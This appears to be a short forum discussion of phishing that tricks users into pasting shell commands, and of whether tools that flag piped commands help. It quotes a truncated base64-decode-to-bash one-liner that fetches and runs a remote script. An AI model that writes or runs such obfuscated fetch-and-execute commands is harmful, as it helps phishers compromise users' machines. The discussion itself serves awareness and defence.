Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern, less -U or cat -v is what you want).

Sure so how many people do you think saw `echo "Y3Vy[...]ggJg==" | base64 -d | bash` and thought "hmm that's suspicious, I'd better check what it is is doing... Ah it's curling another bash script. I'd better see what that script is. Downloads script. Ah I see, a totally legit script. All is well, I'll run the command!"

Its zero. Zero people. Nobody is competent enough to download and review a bash script and also not recognise this obvious scam.

They probably threw the pipe detection in just because they could (and because it's talked about so frequently).